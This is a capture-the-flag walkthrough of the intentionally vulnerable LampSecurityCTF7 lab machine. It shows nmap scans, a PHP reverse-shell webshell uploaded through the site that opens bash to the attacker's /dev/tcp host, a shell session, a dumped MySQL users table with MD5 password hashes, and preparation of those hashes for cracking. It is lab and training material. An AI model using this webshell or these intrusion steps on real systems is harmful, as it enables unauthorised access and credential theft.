LampSecurityCTF7 target machine pentest (SQL injection, file upload, password spraying)

news/2024/10/5 0:06:26/

Target overview

LampSecurityCTF7, a vulnhub target machine

Host discovery

Because of a configuration problem with the target VM, its IP could not be found by scanning.

Pay special attention here: the first time you boot the target VM, VMware pops up a dialog asking you to choose "I copied it" / "I moved it". You must choose "moved"; with "moved" the network environment is reproduced completely. Otherwise host discovery may fail to find the target. If it later turns out that host discovery really does not work, don't panic, just reinstall it.
(https://blog.csdn.net/Bossfrank/article/details/131324929)

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:32 CST
Nmap scan report for 192.168.50.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.156
Host is up (0.000081s latency).
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.90 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.156                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:42 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00044s latency).
Not shown: 65505 filtered tcp ports (no-response), 21 filtered tcp ports (host-prohibited)
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:46 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00042s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 1000 -p- 192.168.50.156                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:49 CST
Warning: 192.168.50.156 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00039s latency).
All 65535 scanned ports on bogon (192.168.50.156) are in ignored states.
Not shown: 64800 open|filtered udp ports (no-response), 735 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 719.01 seconds

Vulnerability script scan (the scan is very slow, not sure why)

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:32 CST
Stats: 0:26:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.80% done; ETC: 12:00 (0:00:53 remaining)
Stats: 0:35:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.34% done; ETC: 12:09 (0:00:59 remaining)
Stats: 0:43:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 12:16 (0:00:47 remaining)
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00030s latency).

PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum: 
|_  /login.php: Possible admin folder
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 3316.13 seconds

Web pentest

Try injection.

Tried injection on port 8080 and couldn't get it to work; it seems the comment syntax for this database version is a bit off. There is an error message, so take a look at it.

Injecting this way works.

There is an upload, so consider uploading a webshell.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ vim shell.php

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>

Next, find where shell.php lives so it can send a shell back to Kali.
Scan the directories; the uploaded file shows up under assets.

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.156/
[sudo] password for kali: 
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Sep 27 13:54:34 2024
URL_BASE: http://192.168.50.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.50.156/ ----
+ http://192.168.50.156/about (CODE:200|SIZE:4910)
==> DIRECTORY: http://192.168.50.156/assets/
+ http://192.168.50.156/backups (CODE:301|SIZE:333)
+ http://192.168.50.156/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.50.156/contact (CODE:200|SIZE:5017)
==> DIRECTORY: http://192.168.50.156/css/
+ http://192.168.50.156/db (CODE:200|SIZE:3904)
+ http://192.168.50.156/default (CODE:200|SIZE:6058)
+ http://192.168.50.156/footer (CODE:200|SIZE:3904)
+ http://192.168.50.156/header (CODE:200|SIZE:3904)
==> DIRECTORY: http://192.168.50.156/img/
==> DIRECTORY: http://192.168.50.156/inc/
+ http://192.168.50.156/index.php (CODE:200|SIZE:6058)
==> DIRECTORY: http://192.168.50.156/js/
+ http://192.168.50.156/newsletter (CODE:200|SIZE:4037)
+ http://192.168.50.156/phpinfo (CODE:200|SIZE:58734)
+ http://192.168.50.156/profile (CODE:200|SIZE:3977)
+ http://192.168.50.156/read (CODE:302|SIZE:1)
+ http://192.168.50.156/recovery (CODE:200|SIZE:4807)
+ http://192.168.50.156/register (CODE:200|SIZE:6591)
+ http://192.168.50.156/signup (CODE:200|SIZE:4783)
+ http://192.168.50.156/usage (CODE:403|SIZE:287)
==> DIRECTORY: http://192.168.50.156/webalizer/
==> DIRECTORY: http://192.168.50.156/webmail/

---- Entering directory: http://192.168.50.156/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.156/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.156/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.156/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.156/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.156/webalizer/ ----
+ http://192.168.50.156/webalizer/index.html (CODE:200|SIZE:3631)

---- Entering directory: http://192.168.50.156/webmail/ ----
+ http://192.168.50.156/webmail/bin (CODE:403|SIZE:293)
+ http://192.168.50.156/webmail/config (CODE:403|SIZE:296)
+ http://192.168.50.156/webmail/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.50.156/webmail/index.php (CODE:200|SIZE:5157)
==> DIRECTORY: http://192.168.50.156/webmail/installer/
+ http://192.168.50.156/webmail/LICENSE (CODE:403|SIZE:297)
+ http://192.168.50.156/webmail/logs (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.50.156/webmail/plugins/
==> DIRECTORY: http://192.168.50.156/webmail/program/
+ http://192.168.50.156/webmail/README (CODE:403|SIZE:296)
+ http://192.168.50.156/webmail/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.50.156/webmail/skins/
+ http://192.168.50.156/webmail/SQL (CODE:403|SIZE:293)
+ http://192.168.50.156/webmail/temp (CODE:403|SIZE:294)

---- Entering directory: http://192.168.50.156/webmail/installer/ ----
==> DIRECTORY: http://192.168.50.156/webmail/installer/images/
+ http://192.168.50.156/webmail/installer/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.50.156/webmail/plugins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/emoticons/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/userinfo/

---- Entering directory: http://192.168.50.156/webmail/program/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.156/webmail/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/

---- Entering directory: http://192.168.50.156/webmail/installer/images/ ----

---- Entering directory: http://192.168.50.156/webmail/plugins/archive/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/

---- Entering directory: http://192.168.50.156/webmail/plugins/emoticons/ ----

---- Entering directory: http://192.168.50.156/webmail/plugins/help/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/content/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/

---- Entering directory: http://192.168.50.156/webmail/plugins/password/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/drivers/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/helpers/
+ http://192.168.50.156/webmail/plugins/password/README (CODE:200|SIZE:10645)

---- Entering directory: http://192.168.50.156/webmail/plugins/userinfo/ ----

---- Entering directory: http://192.168.50.156/webmail/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/includes/
+ http://192.168.50.156/webmail/skins/classic/README (CODE:200|SIZE:855)
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/templates/

---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/classic/

---- Entering directory: http://192.168.50.156/webmail/plugins/help/content/ ----

---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/

---- Entering directory: http://192.168.50.156/webmail/plugins/password/drivers/ ----

---- Entering directory: http://192.168.50.156/webmail/plugins/password/helpers/ ----

---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/buttons/
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/display/
+ http://192.168.50.156/webmail/skins/classic/images/favicon.ico (CODE:200|SIZE:1150)
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/icons/

---- Entering directory: http://192.168.50.156/webmail/skins/classic/includes/ ----

---- Entering directory: http://192.168.50.156/webmail/skins/classic/templates/ ----

---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/classic/ ----

---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/

---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/buttons/ ----

---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/display/ ----

---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/icons/ ----

---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/ ----

-----------------
END_TIME: Fri Sep 27 13:59:21 2024
DOWNLOADED: 124624 - FOUND: 32

Clicking shell.php, the server parses it and executes the PHP, and Kali gets the shell.

Initial shell

Check the basic information

bash-4.1$ sudo -l
sudo -l
sudo: sorry, you must have a tty to run sudo
bash-4.1$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.1$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
    inet6 fe80::20c:29ff:fe9d:12a9/64 scope link 
       valid_lft forever preferred_lft forever
bash-4.1$ python --version
python --version
Python 2.6.6
bash-4.1$ uname -a
uname -a
Linux bogon 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
bash-4.1$ whoami
whoami
apache
bash-4.1$ 

Upgrade the shell with python
Tried to check the current user's sudo rights; it asks for a password, which we don't have yet.

bash-4.1$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.1$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for apache: exit
Sorry, try again.
[sudo] password for apache: root
Sorry, try again.
[sudo] password for apache: admin
Sorry, try again.
sudo: 3 incorrect password attempts

Do some internal information gathering

bash-4.1$ pwd
pwd
/var/www/html/assets
bash-4.1$ cd /var/www    
cd /var/www
bash-4.1$ ls
ls
admin  cgi-bin  error  html  icons
bash-4.1$ cd admin
cd admin
bash-4.1$ ls
ls
docs          index.php   newsletters.php  reservations.php
feedback.php  login.php   phpmyadmin       trainings.php
inc           logout.php  readings.php     users.php
bash-4.1$ ls -liah
ls -liah
total 68K
260349 drwxrwxr-x. 5 webdev webdev 4.0K Dec 19  2012 .
259983 drwxr-xr-x. 7 root   root   4.0K Dec 19  2012 ..
260460 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11  2012 docs
260476 -rw-rw-r--. 1 webdev webdev 1.5K Dec 24  2012 feedback.php
260436 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11  2012 inc
260351 -rw-r--r--. 1 webdev webdev  314 Dec 24  2012 index.php
260442 -rw-rw-r--. 1 webdev webdev  885 Dec 24  2012 login.php
260445 -rw-rw-r--. 1 webdev webdev  236 Dec 24  2012 logout.php
260472 -rw-rw-r--. 1 webdev webdev 3.8K Dec 24  2012 newsletters.php
270632 drwxr-xr-x. 9 root   root   4.0K Dec 19  2012 phpmyadmin
260471 -rw-rw-r--. 1 webdev webdev 6.5K Dec 24  2012 readings.php
270635 -rw-rw-r--. 1 webdev webdev 2.5K Dec 24  2012 reservations.php
260439 -rw-rw-r--. 1 webdev webdev 5.6K Dec 24  2012 trainings.php
260447 -rw-rw-r--. 1 webdev webdev 4.8K Dec 24  2012 users.php
bash-4.1$ cd inc
cd inc
bash-4.1$ ls
ls
admin_footer.php  admin_header.php  base.php  db.php
bash-4.1$ 

Found a database connection file


bash-4.1$ cat db.php
cat db.php
<?php
/**
 * This file is part of the LAMPSecurity CTF 7
 * http://sourceforge.net/projects/lampsecurity
 * by Justin C. Klein Keane
 */
class DatabaseConnection {
    public function __construct() {
        $this->conn = mysql_connect('localhost', 'root', ''); // Change in prod
        if (!$this->conn) die('Could not connect: ' . mysql_error());
        mysql_select_db('website');
    }

    public function query($query) {
        $result = mysql_query($query);
        if (!$result) {
            $message  = 'Invalid query: ' . mysql_error() . "\n";
            $message .= 'Whole query: ' . $query;
            die($message);
        }
        $retval = array();
        while ($row = mysql_fetch_assoc($result)) $retval[] = $row;
        return $retval;
    }
}

function dbin($string) {
    return mysql_real_escape_string($string);
}

$db = new DatabaseConnection();
bash-4.1$ 

Log in to mysql (mysql's output echo and the like need an interactive shell; after catching a shell, upgrading it with python is the usual step)

bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ mysql -uroot
mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 88
Server version: 5.1.66 Source distribution

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Look at the database contents

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| roundcube          |
| website            |
+--------------------+
4 rows in set (0.00 sec)

mysql> use website
use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| contact           |
| documents         |
| hits              |
| log               |
| newsletter        |
| payment           |
| trainings         |
| trainings_x_users |
| users             |
+-------------------+
9 rows in set (0.00 sec)

mysql> 

Look at the contents of the users table

mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username                      | password                         | is_admin | last_login          | user_id | realname        | profile                                                                  |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |        1 | 2012-12-19 11:30:54 |       3 | Brian Hershel   | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |        1 | NULL                |       4 | John Durham     |                                                                          |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |        1 | NULL                |       5 | Alice Wonder    |                                                                          |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |        1 | NULL                |       6 | Ruby Spinster   |                                                                          |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |        1 | NULL                |       7 | Leon Parnetta   |                                                                          |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |        1 | NULL                |       8 | Julia Fields    |                                                                          |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |        0 | NULL                |       9 | Michael Saint   |                                                                          |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |        0 | NULL                |      10 | Bruce Pottricks |                                                                          |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |        0 | NULL                |      11 | Neil Felstein   |                                                                          |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |        0 | NULL                |      12 | Charles Adams   |                                                                          |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |        0 | NULL                |      36 |                 |                                                                          |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |        0 | NULL                |     113 |                 |                                                                          |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
12 rows in set (0.00 sec)

Crack the MD5 hashes


mysql> select username,password from users
select username,password from users
    -> ;
;
+-------------------------------+----------------------------------+
| username                      | password                         |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
12 rows in set (0.00 sec)

mysql> 

Pull the usernames and passwords to the local machine and process them with awk first.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst  
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |

Use awk to pull out the usernames and write them to a file, users.lst (the kind of fine-grained handling that is typical of red-team work).

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}'
[sudo] password for kali: 
brian@localhost.localdomain
john@localhost.localdomain
alice@localhost.localdomain
ruby@localhost.localdomain
leon@localhost.localdomain
julia@localhost.localdomain
michael@localhost.localdomain
bruce@localhost.localdomain
neil@localhost.localdomain
charles@localhost.localdomain
foo@bar.com
test@nowhere.com
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}'
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}' > users.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat users.lst 
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test

Extract the hashes

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst                                                                
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}'
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}' > hash.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hash.lst 
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
